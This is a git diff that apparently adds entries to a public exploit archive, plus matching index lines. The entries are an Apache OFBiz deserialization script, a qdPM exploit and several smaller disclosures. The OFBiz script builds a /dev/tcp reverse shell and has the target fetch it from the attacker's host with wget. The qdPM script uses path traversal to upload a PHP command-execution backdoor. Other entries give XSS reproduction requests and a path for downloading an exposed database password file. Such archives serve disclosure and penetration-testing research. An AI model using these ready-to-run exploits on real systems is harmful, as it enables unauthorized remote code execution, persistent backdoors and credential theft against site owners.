diff --git a/exploits/java/webapps/50178.sh b/exploits/java/webapps/50178.sh
new file mode 100755
index 000000000..ad275485f
--- /dev/null
+++ b/exploits/java/webapps/50178.sh
@@ -0,0 +1,78 @@
+# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
+# Date: 2021-08-04
+# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
+# Vendor Homepage: https://ofbiz.apache.org/index.html
+# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
+# Version: 17.12.01
+# Tested on: Linux
+
+# CVE : CVE-2020-9496
+
+# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
+
+# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.
+
+#!/usr/bin/env bash
+
+# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
+# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
+#
+# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
+# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
+#
+# Steps to exploit:
+#
+# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
+# Step 2: Start nc listener (Recommended 8001).
+# Step 3: Run the exploit.
+
+
+url='https://127.0.0.1' # CHANGE THIS
+port=8443 # CHANGE THIS
+
+function helpPanel(){
+ echo -e "\nUsage:"
+ echo -e "\t[-i] Attacker's IP"
+ echo -e "\t[-p] Attacker's Port"
+ echo -e "\t[-h] Show help pannel"
+ exit 1
+}
+
+
+function ctrl_c(){
+ echo -e "\n\n[!] Exiting...\n"
+ exit 1
+}
+# Ctrl + C
+trap ctrl_c INT
+
+function webRequest(){
+ echo -e "\n[*] Creating a shell file with bash\n"
+ echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
+ echo -e "[*] Downloading YsoSerial JAR File\n"
+ wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
+ echo -e "[*] Generating a JAR payload\n"
+ payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
+ echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
+ curl -s $url:$port/webtools/control/xmlrpc -X POST -d "ProjectDiscoverytest$payload" -k -H 'Content-Type:application/xml' &>/dev/null
+ echo -e "[*] Generating a second JAR payload"
+ payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n")
+ echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5
+ curl -s $url:$port/webtools/control/xmlrpc -X POST -d "ProjectDiscoverytest$payload2" -k -H 'Content-Type:application/xml' &>/dev/null
+ echo -e "\n[*]Deleting Files..."
+ rm ysoserial-master-d367e379d9-1.jar && rm shell.sh
+}
+
+declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do
+ case $arg in
+ i) ip=$OPTARG; let parameter_enable+=1;;
+ p) ncport=$OPTARG; let parameter_enable+=1;;
+ h) helpPanel;;
+ esac
+done
+
+if [ $parameter_enable -ne 2 ]; then
+ helpPanel
+else
+ webRequest
+fi
\ No newline at end of file
diff --git a/exploits/php/webapps/49352.txt b/exploits/php/webapps/49352.txt
index e7f524bc3..daa3dd95f 100644
--- a/exploits/php/webapps/49352.txt
+++ b/exploits/php/webapps/49352.txt
@@ -8,6 +8,7 @@
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
+# CVE: CVE-2021-25791
Step 1: Create a new user then login
Step 2: Click on "Register" page to register a room.
diff --git a/exploits/php/webapps/50174.txt b/exploits/php/webapps/50174.txt
new file mode 100644
index 000000000..2b11d48f3
--- /dev/null
+++ b/exploits/php/webapps/50174.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)
+# Date: 2021-08-03
+# Exploit Author: Aryan Chehreghani
+# Software Link: https://wordpress.org/plugins/customize-login/
+# Version: 1.1
+# Tested on: Windows 10
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.8
+2. Install and activate WP Customize Login
+3. Navigate to Customize Login under Settings Tab >> enter the XSS payload into the Change Logo Title input field.
+4. Click Save Changes.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: ">
\ No newline at end of file
diff --git a/exploits/php/webapps/50175.py b/exploits/php/webapps/50175.py
new file mode 100755
index 000000000..3685a1e7e
--- /dev/null
+++ b/exploits/php/webapps/50175.py
@@ -0,0 +1,112 @@
+# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
+# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
+# Date: 2021-08-03
+# Original Exploit Author: Rishal Dwivedi (Loginsoft)
+# Original ExploitDB ID: 47954
+# Exploit Author: Leon Trappett (thepcn3rd)
+# Vendor Homepage: http://qdpm.net/
+# Software Link: http://qdpm.net/download-qdpm-free-project-management
+# Version: <=1.9.1
+# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
+# CVE : CVE-2020-7246
+# Exploit written in Python 3.9.2
+# Tested Environment - Ubuntu Server 20.04 LTS
+# Path Traversal + Remote Code Execution
+
+#!/usr/bin/python3
+
+import sys
+import requests
+from lxml import html
+from argparse import ArgumentParser
+
+session_requests = requests.session()
+
+def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
+ request_1 = {
+ 'sf_method': (None, 'put'),
+ 'users[id]': (None, userid[-1]),
+ 'users[photo_preview]': (None, uservar),
+ 'users[_csrf_token]': (None, csrftoken_[-1]),
+ 'users[name]': (None, username[-1]),
+ 'users[new_password]': (None, ''),
+ 'users[email]': (None, EMAIL),
+ 'extra_fields[9]': (None, ''),
+ 'users[remove_photo]': (None, '1'),
+ }
+ return request_1
+
+
+def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
+ request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
+'.htaccess')
+ new = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
+files=request_1)
+ request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
+'../.htaccess')
+ new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
+files=request_2)
+ request_3 = {
+ 'sf_method': (None, 'put'),
+ 'users[id]': (None, userid[-1]),
+ 'users[photo_preview]': (None, ''),
+ 'users[_csrf_token]': (None, csrftoken_[-1]),
+ 'users[name]': (None, username[-1]),
+ 'users[new_password]': (None, ''),
+ 'users[email]': (None, EMAIL),
+ 'extra_fields[9]': (None, ''),
+ 'users[photo]': ('backdoor.php',
+ '"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>'
+ , 'application/octet-stream'),
+ }
+ upload_req = session_requests.post(HOSTNAME +
+'index.php/myAccount/update', files=request_3)
+
+
+def main(HOSTNAME, EMAIL, PASSWORD):
+ url = HOSTNAME + '/index.php/login'
+ result = session_requests.get(url)
+ #print(result.text)
+ login_tree = html.fromstring(result.text)
+ authenticity_token =
+list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
+ payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
+'login[_csrf_token]': authenticity_token}
+ result = session_requests.post(HOSTNAME + '/index.php/login',
+data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
+ # The designated admin account does not have a myAccount page
+ account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
+ account_tree = html.fromstring(account_page.content)
+ userid = account_tree.xpath("//input[@name='users[id]']/@value")
+ username = account_tree.xpath("//input[@name='users[name]']/@value")
+ csrftoken_ =
+account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
+ req(userid, username, csrftoken_, EMAIL, HOSTNAME)
+ get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
+ final_tree = html.fromstring(get_file.content)
+ backdoor =
+final_tree.xpath("//input[@name='users[photo_preview]']/@value")
+ print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' +
+backdoor[-1] + '?cmd=whoami')
+
+
+if __name__ == '__main__':
+ print("You are not able to use the designated admin account because
+they do not have a myAccount page.\n")
+ parser = ArgumentParser(description='qdmp - Path traversal + RCE
+Exploit')
+ parser.add_argument('-url', '--host', dest='hostname', help='Project
+URL')
+ parser.add_argument('-u', '--email', dest='email', help='User email
+(Any privilege account)')
+ parser.add_argument('-p', '--password', dest='password', help='User
+password')
+ args = parser.parse_args()
+ # Added detection if the arguments are passed and populated, if not
+display the arguments
+ if (len(sys.argv) > 1 and isinstance(args.hostname, str) and
+isinstance(args.email, str) and isinstance(args.password, str)):
+ main(args.hostname, args.email, args.password)
+ else:
+ parser.print_help()
\ No newline at end of file
diff --git a/exploits/php/webapps/50176.txt b/exploits/php/webapps/50176.txt
new file mode 100644
index 000000000..77ff54d95
--- /dev/null
+++ b/exploits/php/webapps/50176.txt
@@ -0,0 +1,9 @@
+# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
+# Date: 03/08/2021
+# Exploit Author: Leon Trappett (thepcn3rd)
+# Vendor Homepage: https://qdpm.net/
+# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
+# Version: 9.2
+# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4
+
+The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download.
\ No newline at end of file
diff --git a/exploits/php/webapps/50177.txt b/exploits/php/webapps/50177.txt
new file mode 100644
index 000000000..fb45063d3
--- /dev/null
+++ b/exploits/php/webapps/50177.txt
@@ -0,0 +1,63 @@
+# Exploit Title: Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)
+# Date: 2021-08-04
+# Exploit Author: Mohammad Koochaki
+# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
+# Version: 1.1
+# Tested on: Ubuntu 20.04.2 LTS, PHP 7.4.3
+
+### This application is prone to a cross-site scripting in the 'searchdata'
+parameter at the following path:
+ - Reflected: http://localhost/admin/search-invoices.php
+ - Reflected: http://localhost/client/search-invoices.php
+ - Stored: http://localhost/client/client-profile.php
+
+### Payloads:
+ - Reflected:
+ - Stored: ">Anuj+Kumar
+
+### PoC:
+
+## Reflected:
+POST /admin/search-invoices.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 77
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/admin/search-invoices.php
+Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Sec-GPC: 1
+
+searchdata=&search=
+
+
+## Stored:
+POST /client/client-profile.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 335
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/client/client-profile.php
+Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Sec-GPC: 1
+
+cname=">Anuj+Kumar&comname=PHPGurukul+Programming+Blog&address=New+Delhi&city=New+Delhi&state=Delhi&zcode=110001&wphnumber=9354778033&cellphnumber=9354778033&ophnumber=9354778033&email=phpgurukulofficial%
+40gmail.com&websiteadd=https%3A%2F%2Fphpgurukul.com¬es=New+User&submit=
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 85275e73d..af83c88d3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44304,3 +44304,8 @@ id,file,description,date,author,type,platform,port
50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",2021-08-02,"Mohammad Koochaki",webapps,php,
50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF",2021-08-02,LiquidWorm,webapps,hardware,
50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",2021-08-03,"Merbin Russel",webapps,php,
+50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",2021-08-04,"Aryan Chehreghani",webapps,php,
+50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-04,"Leon Trappett",webapps,php,
+50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)",2021-08-04,"Leon Trappett",webapps,php,
+50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,
+50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments",2021-08-04,"Adrián Díaz",webapps,java,